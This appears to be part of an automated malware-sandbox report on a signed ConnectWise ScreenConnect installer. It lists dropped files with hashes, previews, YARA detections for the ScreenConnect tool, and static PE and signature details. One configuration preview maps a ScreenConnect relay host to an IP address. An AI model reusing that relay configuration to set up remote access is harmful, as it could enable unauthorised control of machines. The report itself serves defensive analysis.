                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.8084437388556067
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:v8Ph2uRc06WXzEFT5VIYIR7imqcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrmh:uh215FTC7izp4fed/4G3f9FD9lqK
                                                                                                            MD5:AF358D9BEEC9195C8DC9FED4D4FC0DAD
                                                                                                            SHA1:1EB96EE0409EC416F97F0ECF9CB3643CFAEE0A5B
                                                                                                            SHA-256:83B419F9CE6C3E7A454AF12CCB13F1D688045F53777FD5A4A901169720F467BA
                                                                                                            SHA-512:46D4807809AC467ED9B5EC83B13F51E1820FD317AF1225D4DFFDA4662F57C74563BCA8CCB75F3AF34F32B2E4AFDF5ADD4888A269C359D680C3D84C17EF3634CD
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Installer\{BD3FDC30-5D5E-2216-6CDD-B291951C7FFE}\DefaultIcon

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                                                            Category:dropped
                                                                                                            Size (bytes):435
                                                                                                            Entropy (8bit):5.289734780210945
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                                                            MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                                                            SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                                                            SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                                                            SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                                                            Malicious:false
                                                                                                            Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.

                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):360001
                                                                                                            Entropy (8bit):5.362976345308274
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaue:zTtbmkExhMJCIpEr
                                                                                                            MD5:56DD985EF0355D90CC1E5DA0E3E870AF
                                                                                                            SHA1:D156C943F14E48956C7625ACE3AEB95D1BA637E2
                                                                                                            SHA-256:E185853CED5B5E3D889CF878A32F5DE265A4735C61402CC1EB385410DF1CD7E3
                                                                                                            SHA-512:554F8783BD33F0F13DA36AA17814885AB152DD41EE990A705799427524E6A0A972EA391CAFA88D365DCA97F6F305E15CE324D53252E874398717E2A92C36377D
                                                                                                            Malicious:false
                                                                                                            Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):55
                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                            Malicious:false
                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                            C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)\3dcrjuoq.newcfg

                                                                                                            Download File
                                                                                                            Process:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):565
                                                                                                            Entropy (8bit):5.014055475464337
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOmMx0dhEitmQv/vXbAa3xT:2dL9hK6E46YPEJn3vH
                                                                                                            MD5:25CCE00363E65228151D958324BA586B
                                                                                                            SHA1:967E11FBE9EEB946E9B6F02BC6D8E815080E4739
                                                                                                            SHA-256:2E5DDB674273A2446E4B8D20B67702B72D50CBE961A27E56C110124C35990628
                                                                                                            SHA-512:DE97ED7F0917674EFB8ED521E7488EB3FACA5289E4865F8CDDFC2ABFE10FEF01231D60871AE5100D1BE638DD272FA459CF429261E55A49432211408CF8FEDCEC
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>sc.connectprotocol.es=38.69.12.167-03%2f12%2f2024%2015%3a20%3a15</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                            C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)\user.config (copy)

                                                                                                            Download File
                                                                                                            Process:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):565
                                                                                                            Entropy (8bit):5.014055475464337
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOmMx0dhEitmQv/vXbAa3xT:2dL9hK6E46YPEJn3vH
                                                                                                            MD5:25CCE00363E65228151D958324BA586B
                                                                                                            SHA1:967E11FBE9EEB946E9B6F02BC6D8E815080E4739
                                                                                                            SHA-256:2E5DDB674273A2446E4B8D20B67702B72D50CBE961A27E56C110124C35990628
                                                                                                            SHA-512:DE97ED7F0917674EFB8ED521E7488EB3FACA5289E4865F8CDDFC2ABFE10FEF01231D60871AE5100D1BE638DD272FA459CF429261E55A49432211408CF8FEDCEC
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>sc.connectprotocol.es=38.69.12.167-03%2f12%2f2024%2015%3a20%3a15</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                            C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1590
                                                                                                            Entropy (8bit):5.363907225770245
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                                            MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                                            SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                                            SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                                            SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture

                                                                                                            C:\Windows\Temp\~DF05F0D14B49496305.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.8084437388556067
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:v8Ph2uRc06WXzEFT5VIYIR7imqcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrmh:uh215FTC7izp4fed/4G3f9FD9lqK
                                                                                                            MD5:AF358D9BEEC9195C8DC9FED4D4FC0DAD
                                                                                                            SHA1:1EB96EE0409EC416F97F0ECF9CB3643CFAEE0A5B
                                                                                                            SHA-256:83B419F9CE6C3E7A454AF12CCB13F1D688045F53777FD5A4A901169720F467BA
                                                                                                            SHA-512:46D4807809AC467ED9B5EC83B13F51E1820FD317AF1225D4DFFDA4662F57C74563BCA8CCB75F3AF34F32B2E4AFDF5ADD4888A269C359D680C3D84C17EF3634CD
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF05F0D14B49496305.TMP, Author: Joe Security
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Temp\~DF1EB5E7BF39639B69.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Temp\~DF2927D72FC9DE2460.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):0.07756281497129278
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOUfKo0V8h9YQASKChiVky6l51:2F0i8n0itFzDHFUfK2Yw7r
                                                                                                            MD5:71154BF8B43A35F87A6ACAD827B1F92C
                                                                                                            SHA1:E108E84146383B21010D15745839EA73B54F678E
                                                                                                            SHA-256:26F89EA28068E2244003A076771C10C81CF12B1CF8694A45E345107D28CD5E09
                                                                                                            SHA-512:74C4DE97FBC8AB72DE77491E2D5F2657A003C1F2E130C09B14E602E6B303F6E4CCC1419695DE60DF7832C03B84985031C99A1DFC91397CDC53526A29AF46D60D
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Temp\~DF41B436AB0646E29B.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Temp\~DF5F6339E16C6791FF.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):1.4262159114293096
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:apeuGth8FXz5T5aUtIYIR7imqcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrmA2:qes3Tod7izp4fed/4G3f9FD9lqK
                                                                                                            MD5:5CB96CC6D145979104FFBFEE7DC413EF
                                                                                                            SHA1:AECFC2940CA896566E06C3C8C9207AEEE84944E7
                                                                                                            SHA-256:9AAB92CC787FA6468A5157F4C5FE8A1C985E86943860036902A76FF8C32DAC69
                                                                                                            SHA-512:164909DFC6976AB154B9A7EEA1346BF46B4E1C83CFADEDF4AAC15E558AD04E5B6E485309FF07CA06C8B9AD55C265010EA6E13B934970C7F7D3E744A4CDE6444E
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF5F6339E16C6791FF.TMP, Author: Joe Security
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Temp\~DF95EDA655A8F37718.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Temp\~DFA01B11556604F6BD.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):1.4262159114293096
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:apeuGth8FXz5T5aUtIYIR7imqcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrmA2:qes3Tod7izp4fed/4G3f9FD9lqK
                                                                                                            MD5:5CB96CC6D145979104FFBFEE7DC413EF
                                                                                                            SHA1:AECFC2940CA896566E06C3C8C9207AEEE84944E7
                                                                                                            SHA-256:9AAB92CC787FA6468A5157F4C5FE8A1C985E86943860036902A76FF8C32DAC69
                                                                                                            SHA-512:164909DFC6976AB154B9A7EEA1346BF46B4E1C83CFADEDF4AAC15E558AD04E5B6E485309FF07CA06C8B9AD55C265010EA6E13B934970C7F7D3E744A4CDE6444E
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFA01B11556604F6BD.TMP, Author: Joe Security
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Temp\~DFA2315AC072D60478.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.8084437388556067
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:v8Ph2uRc06WXzEFT5VIYIR7imqcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrmh:uh215FTC7izp4fed/4G3f9FD9lqK
                                                                                                            MD5:AF358D9BEEC9195C8DC9FED4D4FC0DAD
                                                                                                            SHA1:1EB96EE0409EC416F97F0ECF9CB3643CFAEE0A5B
                                                                                                            SHA-256:83B419F9CE6C3E7A454AF12CCB13F1D688045F53777FD5A4A901169720F467BA
                                                                                                            SHA-512:46D4807809AC467ED9B5EC83B13F51E1820FD317AF1225D4DFFDA4662F57C74563BCA8CCB75F3AF34F32B2E4AFDF5ADD4888A269C359D680C3D84C17EF3634CD
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFA2315AC072D60478.TMP, Author: Joe Security
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Temp\~DFB9D17362A4D0E7A8.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):1.4262159114293096
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:apeuGth8FXz5T5aUtIYIR7imqcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrmA2:qes3Tod7izp4fed/4G3f9FD9lqK
                                                                                                            MD5:5CB96CC6D145979104FFBFEE7DC413EF
                                                                                                            SHA1:AECFC2940CA896566E06C3C8C9207AEEE84944E7
                                                                                                            SHA-256:9AAB92CC787FA6468A5157F4C5FE8A1C985E86943860036902A76FF8C32DAC69
                                                                                                            SHA-512:164909DFC6976AB154B9A7EEA1346BF46B4E1C83CFADEDF4AAC15E558AD04E5B6E485309FF07CA06C8B9AD55C265010EA6E13B934970C7F7D3E744A4CDE6444E
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFB9D17362A4D0E7A8.TMP, Author: Joe Security
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Temp\~DFC845492C3A60EE1F.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Temp\~DFE4D607A3416BF7CD.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):69632
                                                                                                            Entropy (8bit):0.23753306790899892
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:BelKx9fvnDBAduHvlS3qcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrei05IYI:BqKXxp4fed/4G3f9FDVi0
                                                                                                            MD5:B526FC196C323AB4CBF956B63AA5F9B3
                                                                                                            SHA1:7939DD3F04999A827F64378C1808FE30A6AAB277
                                                                                                            SHA-256:BB8DEAED52AEBAEF4444EF9743CA6D02448CBAA0E1F669C14EB1528AD457B053
                                                                                                            SHA-512:3A394F2A12D6105AFF444D85E56E2D359A1F3935E8B6B176C735CAD8A2F5769E10B017E7157A3FA5C42F4272EBB90A695EEB53A75F3CA8EAD01AE0294CC4D57C
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFE4D607A3416BF7CD.TMP, Author: Joe Security
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Windows\Temp\~DFE725681182478DE3.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):7.429448251981768
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:tiG6Ep202n.exe
                                                                                                            File size:5'620'136 bytes
                                                                                                            MD5:e7e869eca1d9e7fb0c7197725f3e22e5
                                                                                                            SHA1:0443247608194aa371b80e0f398f7180436821bb
                                                                                                            SHA256:58dff1cfcae1349d3e7cc009fb0cf1c109bdb4a5f3d2f8101ff9bd61d514a811
                                                                                                            SHA512:b987f0d89556e675ea2b7e153084b762ccc07d137c2d2bfd2c92c0fb2ec2dd7ed5c29f559513ea5eebadee4b13e06c955be8361c144cb7708623ab7dcf1fae1e
                                                                                                            SSDEEP:49152:0EEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:9Es6efPNwJ4t1h0cG5FGJRPxow8O
                                                                                                            TLSH:5146E111B3DA95B9D4BF063CD87A82699A74BC044712C7EF53D4BD2D2D32BC05A323A6
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........

                                                                                                            File Icon

                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x4014ad
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:true
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:5
                                                                                                            OS Version Minor:1
                                                                                                            File Version Major:5
                                                                                                            File Version Minor:1
                                                                                                            Subsystem Version Major:5
                                                                                                            Subsystem Version Minor:1
                                                                                                            Import Hash:9771ee6344923fa220489ab01239bdfd

                                                                                                            Authenticode Signature

                                                                                                            Signature Valid:true
                                                                                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                            Signature Validation Error:The operation completed successfully
                                                                                                            Error Number:0
                                                                                                            Not Before, Not After
                                                                                                            • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                            Subject Chain
                                                                                                            • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                            Version:3
                                                                                                            Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                            Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
